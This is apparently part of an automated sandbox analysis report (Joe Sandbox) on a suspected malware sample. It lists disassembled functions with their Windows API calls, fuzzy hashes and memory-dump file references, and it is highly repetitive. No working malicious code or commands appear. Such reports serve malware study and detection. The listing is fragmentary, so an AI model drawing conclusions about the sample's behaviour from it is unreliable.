                                                                                                                  • Instruction ID: 3956e62fd01e3c065a863859bbc2cff9c57e0acf68b716d119bab4554b82d379
                                                                                                                  • Opcode Fuzzy Hash: 61b5c95b5099b76a587ce3954f3b95dec5b3f83c321fbcfa646464237ed45d1b
                                                                                                                  • Instruction Fuzzy Hash: F2D23A71E082288FDB65CE28CD407EAB7B6EB45314F1845EAE44DE7240D778AF858F61
                                                                                                                  APIs
                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,00000000,?,?,?,00D9C747,?,00000000), ref: 00D9CE0F
                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,?,00D9C747,?,00000000), ref: 00D9CE38
                                                                                                                  • GetACP.KERNEL32(?,?,00D9C747,?,00000000), ref: 00D9CE4D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoLocale
                                                                                                                  • String ID: ACP$OCP
                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                  • Opcode ID: 6f3e65b028d901b59b2e695b4eab03c167944b628aae05a44ee3feefb8fdaaaf
                                                                                                                  • Instruction ID: 0fc6945f2c79d253734742c2b525c288fcfdee3babc7e08326dc03ef9e894f08
                                                                                                                  • Opcode Fuzzy Hash: 6f3e65b028d901b59b2e695b4eab03c167944b628aae05a44ee3feefb8fdaaaf
                                                                                                                  • Instruction Fuzzy Hash: 3221A122A60201EAEF359F64C900B9777A6EB54B64B5AA574F90BD7204F732DE41C3B0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D975D3: GetLastError.KERNEL32(?,?,00D9126E,00DB1540,0000000C), ref: 00D975D7
                                                                                                                    • Part of subcall function 00D975D3: SetLastError.KERNEL32(00000000), ref: 00D97679
                                                                                                                  • GetUserDefaultLCID.KERNEL32 ref: 00D9C719
                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00D9C757
                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00D9C76A
                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00D9C7B2
                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00D9C7CD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 415426439-0
                                                                                                                  • Opcode ID: 7ea239bf8ca60e7db1596fb900d6736cb9d9fc163a2570526846d335fd124fdb
                                                                                                                  • Instruction ID: e0c77f3c6ba1d87a115fe11664db45f6c3fad82092b2eec64910ad2103614469
                                                                                                                  • Opcode Fuzzy Hash: 7ea239bf8ca60e7db1596fb900d6736cb9d9fc163a2570526846d335fd124fdb
                                                                                                                  • Instruction Fuzzy Hash: AA516D71A20205AFEF10EFA5CC81ABB77B8FF49700F485569E911E7291EB70D9048BB1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0370feb49d06202b0a8a2cb5e48f043198ba8953b6faff8e379c5fb6cd4322bb
                                                                                                                  • Instruction ID: 37a066dc76fa12c51f4ac807f9bda618589c05416ca614a213ac30e317d27d68
                                                                                                                  • Opcode Fuzzy Hash: 0370feb49d06202b0a8a2cb5e48f043198ba8953b6faff8e379c5fb6cd4322bb
                                                                                                                  • Instruction Fuzzy Hash: 7B023C71E016199FDF15CFA8D8806AEFBF1FF48324F288269D519A7344D731AA41CBA4
                                                                                                                  APIs
                                                                                                                  • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00D9D448
                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00D9D53C
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00D9D57B
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00D9D5AE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$CloseFile$FirstNext
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1164774033-0
                                                                                                                  • Opcode ID: fa5ed2f2b913e6ded08fab2435c2c8113aba3b13a132f15633ca87e348d3e3e8
                                                                                                                  • Instruction ID: 0f2c70ac7d54c0d788c0cf610ba92cd1963ed7343d60c150ea899ce3d6e72a94
                                                                                                                  • Opcode Fuzzy Hash: fa5ed2f2b913e6ded08fab2435c2c8113aba3b13a132f15633ca87e348d3e3e8
                                                                                                                  • Instruction Fuzzy Hash: B371E4759051589FDF21AF38CC89ABEBBBAEF45304F1841D9E04C97251DA318E849F30
                                                                                                                  APIs
                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00D8B658
                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00D8B724
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D8B73D
                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00D8B747
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 254469556-0
                                                                                                                  • Opcode ID: 6b1e7f735e5017d39a7579d451237724a85003a8a68bb0dc7b923e94f6ad90a1
                                                                                                                  • Instruction ID: cef39a7529c0de3d492e38f6b796ca9cae303d47f5585dbe69553e711835a545
                                                                                                                  • Opcode Fuzzy Hash: 6b1e7f735e5017d39a7579d451237724a85003a8a68bb0dc7b923e94f6ad90a1
                                                                                                                  • Instruction Fuzzy Hash: 4731F875D01318DBEF20EF65D98A7CDBBB8EF08310F1041AAE40CAB250EB719A858F55
                                                                                                                  APIs
                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00D8C379
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00D8C388
                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00D8C391
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 00D8C39E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2933794660-0
                                                                                                                  • Opcode ID: 2b2485e3fc964bd3f789f4cc80d63e29397a9fec69c95ddd97ab76b796f949cd
                                                                                                                  • Instruction ID: 651b8a81d28880dda7113d606df3e4969a4ded15de8de3af887734c4930399d2
                                                                                                                  • Opcode Fuzzy Hash: 2b2485e3fc964bd3f789f4cc80d63e29397a9fec69c95ddd97ab76b796f949cd
                                                                                                                  • Instruction Fuzzy Hash: B4F05F74D1120DEBCF00EBB5DA4999FBBF4FF1C204B914695A412F6211EA30AB449FA0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D975D3: GetLastError.KERNEL32(?,?,00D9126E,00DB1540,0000000C), ref: 00D975D7
                                                                                                                    • Part of subcall function 00D975D3: SetLastError.KERNEL32(00000000), ref: 00D97679
                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D9C951
                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D9C99B
                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D9CA61
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoLocale$ErrorLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 661929714-0
                                                                                                                  • Opcode ID: 906e5e621d442e6e4decc2e1cd4ee39d0c96590b823cffc7b057896360bb9fac
                                                                                                                  • Instruction ID: 2a081cd010179612ca9e28ace45346c775b83597013f1ffece1c77c2d2404303
                                                                                                                  • Opcode Fuzzy Hash: 906e5e621d442e6e4decc2e1cd4ee39d0c96590b823cffc7b057896360bb9fac
                                                                                                                  • Instruction Fuzzy Hash: 2C618E7192020B9FDF28DF28CC82BBA77A8EF14344F1451A9E916C6685EB74D981DB70
                                                                                                                  APIs
                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00D93D09
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00D93D13
                                                                                                                  • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00D93D20
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3906539128-0
                                                                                                                  • Opcode ID: 33bd949e7aecc262a7e8491584009fb80ea4171b2e5e11ddc1d0b62ef5518a95
                                                                                                                  • Instruction ID: a054b5d9949cc68d3dc741cde28361c6ba4b331d15b990fbf17778a827033bcb
                                                                                                                  • Opcode Fuzzy Hash: 33bd949e7aecc262a7e8491584009fb80ea4171b2e5e11ddc1d0b62ef5518a95
                                                                                                                  • Instruction Fuzzy Hash: FA31B275901228DBCB21EF28D98979DBBB8FF18710F5046DAE41CA6251EB709F818F64
                                                                                                                  APIs
                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00DA0B71,?,?,00000008,?,?,00DA700B,00000000), ref: 00DA0E43
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionRaise
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3997070919-0
                                                                                                                  • Opcode ID: 75e336fd388154c3a80b14e716efde8ee19b6efae319f32c2a431ff01fbf2d04
                                                                                                                  • Instruction ID: 81b6b90a5b50405d7f51ff125febc2b5716847b04ca27ae1c2089a328f4f21d4
                                                                                                                  • Opcode Fuzzy Hash: 75e336fd388154c3a80b14e716efde8ee19b6efae319f32c2a431ff01fbf2d04
                                                                                                                  • Instruction Fuzzy Hash: 6DB11A326106099FDB15CF28C48AB657FA1FF46364F298658E8D9CF2A1C335EA91CB50
                                                                                                                  APIs
                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00D8B2CE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2325560087-0
                                                                                                                  • Opcode ID: f261878a24d43c1d1217926e4e46c3085d4ee72481f29669754987e665132ff8
                                                                                                                  • Instruction ID: 0b1ec9d5558d224c388a84a196033ed532e7d3859c96b1a6c29f8bbb58a5f537
                                                                                                                  • Opcode Fuzzy Hash: f261878a24d43c1d1217926e4e46c3085d4ee72481f29669754987e665132ff8
                                                                                                                  • Instruction Fuzzy Hash: 4CA147B6900705DBDB19CF59E8816A9BBF0FB48324F28866AD455E73A0D7349940CF70
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D975D3: GetLastError.KERNEL32(?,?,00D9126E,00DB1540,0000000C), ref: 00D975D7
                                                                                                                    • Part of subcall function 00D975D3: SetLastError.KERNEL32(00000000), ref: 00D97679
                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D9CC03
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3736152602-0
                                                                                                                  • Opcode ID: 661997018082e7831bafcbb9f7f25a4d69945f8df51a2724f240acc86ba5c6c7
                                                                                                                  • Instruction ID: 4c7b67dc849a3ef82613b99cee8193792176da425199010e808c635f71adf783
                                                                                                                  • Opcode Fuzzy Hash: 661997018082e7831bafcbb9f7f25a4d69945f8df51a2724f240acc86ba5c6c7
                                                                                                                  • Instruction Fuzzy Hash: 28219272624206ABDF28AB25DE81A7B77A8EF08710B14117AF905D6141EB75ED40CB70
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 0-4108050209
                                                                                                                  • Opcode ID: 00166d77a42f594b982a2ef7f8b8c97585e7324e2c7f298d23c36512869d4006
                                                                                                                  • Instruction ID: 5ab1afc0b5ccb7aea562a84258c58c96a5fa31786ee4dba2de836be85577d5a8
                                                                                                                  • Opcode Fuzzy Hash: 00166d77a42f594b982a2ef7f8b8c97585e7324e2c7f298d23c36512869d4006
                                                                                                                  • Instruction Fuzzy Hash: 37C1B9309007468FCF29CF68E988BBABFB5AF06304F184619D59AA7691C331E945CB70
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D975D3: GetLastError.KERNEL32(?,?,00D9126E,00DB1540,0000000C), ref: 00D975D7
                                                                                                                    • Part of subcall function 00D975D3: SetLastError.KERNEL32(00000000), ref: 00D97679
                                                                                                                  • EnumSystemLocalesW.KERNEL32(00D9C8FD,00000001,00000000,?,?,?,00D9C6ED,00000000), ref: 00D9C8D4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2417226690-0
                                                                                                                  • Opcode ID: 9fc7cc30974e759cc144cc8f29200241227611af03ad2437d7ed2705ec39e21e
                                                                                                                  • Instruction ID: 5ef2fe7c688ed6d82cf93a5665b8cd4514bad405afbef639b2e414ab75693b54
                                                                                                                  • Opcode Fuzzy Hash: 9fc7cc30974e759cc144cc8f29200241227611af03ad2437d7ed2705ec39e21e
                                                                                                                  • Instruction Fuzzy Hash: D011253B6143059FDF18AF39C8916BABBA2FF84358B18442DE94787A40E371A902C760
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D975D3: GetLastError.KERNEL32(?,?,00D9126E,00DB1540,0000000C), ref: 00D975D7
                                                                                                                    • Part of subcall function 00D975D3: SetLastError.KERNEL32(00000000), ref: 00D97679
                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D9CD23
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
